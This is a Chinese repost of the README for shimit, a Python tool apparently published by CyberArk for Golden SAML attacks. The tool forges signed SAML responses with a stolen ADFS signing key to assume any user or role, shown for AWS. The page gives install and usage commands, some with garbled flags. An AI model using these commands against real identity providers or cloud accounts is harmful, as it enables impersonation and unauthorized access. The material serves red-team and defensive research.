工具概述
shimit是实现Golden SAML攻击的python工具。
在黄金级SAML攻击中,攻击者可以使用所需的任何特权并成为目标应用程序上的任何用户,来访问该应用程序(任何支持SAML身份验证的应用程序)。
shimit允许用户创建一个签名的SAMLResponse对象,并使用它在服务提供者中打开会话。shimit现在支持将AWS Console作为服务提供商使用,还有更多工作要做 …
AWS
在生成并签名SAMLResponse的断言之后,shimit将在AWS中调用AssumeRoleWithSAML()API。然后,会话令牌和密钥将应用于新会话,在该会话中,用户可以使用aws cli通过使用黄金SAML获得的权限来执行操作。
要求
要安装所需的模块,请运行以下命令:
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
用法
为AWS CLI申请会话
python .shimit.py –idphttp://adfs.lab.local/adfs/services/trust-pk key_file -c cert_file
-u domainadmin [email protected] ADFS-admin -r ADFS-monitor -id 123456789012
idp-身份提供商URL,例如http://server.domain.com/adfs/services/trust
pk-私钥文件的完整路径(pem格式)
c-证书文件的完整路径(pem格式)
u-用户名和域名,例如domain username(使用或* nix中的引号)
n-AWS中的会话名称
r -AWS中所需的角色。支持多种角色,将假定第一个角色。
id-AWS账户ID,例如123456789012
将SAMLResponse保存到文件
python .shimit.py -idphttp://adfs.lab.local/adfs/services/trust-pk key_file -c cert_file
-u domainadmin [email protected] ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
o-将编码的SAMLResponse输出到指定的文件路径
python .shimit.py -l saml_response.xml
l-从指定的文件路径加载SAMLResponse
文章来源:
https://github.com/cyberark/shimit
评论(0)